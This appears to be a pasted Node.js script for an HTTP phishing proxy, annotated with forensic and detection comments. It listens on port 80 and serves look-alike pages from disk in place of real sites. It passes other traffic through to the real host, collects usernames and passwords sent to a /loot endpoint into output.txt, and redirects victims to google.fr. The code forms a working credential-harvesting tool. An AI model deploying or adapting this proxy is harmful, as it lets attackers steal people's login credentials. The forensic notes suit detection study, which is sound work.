
Untitled

a guest Jul 16th, 2019 73 Never
  1. const http = require('http');
  2. const fs = require('fs');
  3. const url = require('url');
  4.  
  5.  
  /**
   * HTTP listener on port 80 that answers every request in one of three ways,
   * chosen from the request URL and the Host header:
   *   1. URL begins with /loot: the request is handed to saveCredentials()
   *      and the client receives a 302.
   *   2. Host + URL names a regular file under /var/www/sites/: that file is
   *      sent back as the response body via createTemplate().
   *   3. Anything else: the request is re-issued over plain HTTP to the host
   *      named in the Host header and the upstream reply is relayed unchanged.
   *
   * Review notes (detection / forensics):
   *   - Submitted form values arrive as query parameters on /loot, so they are
   *     visible in any access log or proxy between the client and this process.
   *   - The 302 Location value carries no scheme, so a client resolves it
   *     relative to the requested host; the follow-up request for a path
   *     ending in "www.google.fr" is a recognisable artefact.
   *   - Only plain HTTP is handled (http module, port 80 inbound and
   *     outbound); nothing in this listing terminates or originates TLS.
   */
  http.createServer((incomingRequest, endResponse) => {
    const { url: requestedUrl, method, headers } = incomingRequest;

    // Case 1: credential submission endpoint.
    if (requestedUrl.startsWith("/loot")) {
      saveCredentials(incomingRequest);
      endResponse.statusCode = 302;
      endResponse.setHeader("Location", "www.google.fr");
      return endResponse.end();
    }

    // Both the Host header and the URL are taken verbatim from the request.
    const templatePath = "/var/www/sites/" + headers.host + requestedUrl;

    fs.lstat(templatePath, (statError, stats) => {
      // Case 2: a local file exists for this host/path, so it replaces the
      // real page. It is sent with the default status and no explicit headers.
      const hasTemplate = !statError && stats.isFile();
      if (hasTemplate) {
        return createTemplate(templatePath, (injected) => endResponse.end(injected));
      }

      // Case 3: nothing to substitute; relay the request to the real host.
      console.log("Proxying request...");

      // The outbound request reuses the client's method, path and full header
      // set, so the upstream server sees the client's own headers.
      const clonedRequest = http.request(
        { host: headers.host, path: requestedUrl, port: 80, method, headers },
        (serverResponse) => {
          // Mirror the upstream status line and headers onto the client response.
          endResponse.statusCode = serverResponse.statusCode;
          for (const [name, value] of Object.entries(serverResponse.headers)) {
            endResponse.setHeader(name, value);
          }

          // Relay the upstream body chunk by chunk, then finish the response.
          serverResponse.on('data', (chunk) => endResponse.write(chunk));
          serverResponse.on('end', () => endResponse.end());
        }
      );

      // Forward the client's request body (if any) to the upstream request.
      incomingRequest.on('data', (chunk) => clonedRequest.write(chunk));
      incomingRequest.on('end', () => clonedRequest.end());
    });
  }).listen(80);
  83.  
  84.  
  /**
   * Read a file from disk and pass its contents to `callback`.
   *
   * @param {string} website - Path given unchanged to fs.readFile.
   * @param {function(Buffer|string): *} callback - Called with the file
   *   contents as a Buffer, or with "" when no data was read (for example
   *   when the read failed). The read error itself is discarded.
   * @returns {void}
   */
  function createTemplate(website, callback) {
    fs.readFile(website, (readError, contents) => callback(contents || ""));
  }
  90.  
  /**
   * Write the `username` and `password` query parameters of a request to
   * output.txt as `username:password (host)` followed by CRLF.
   *
   * Forensic notes: the path is relative, so the file is created in the
   * process's working directory; fs.writeFile replaces the file contents on
   * every call, so a recovered output.txt reflects only the latest
   * submission. Write errors are ignored by the empty callback.
   *
   * @param {object} requestObject - Incoming request; only `url` and
   *   `headers.host` are read.
   * @returns {void}
   */
  function saveCredentials(requestObject) {
    const { username, password } = url.parse(requestObject.url, true).query;
    const record = `${username}:${password} (${requestObject.headers.host})\r\n`;
    fs.writeFile("output.txt", record, () => {});
  }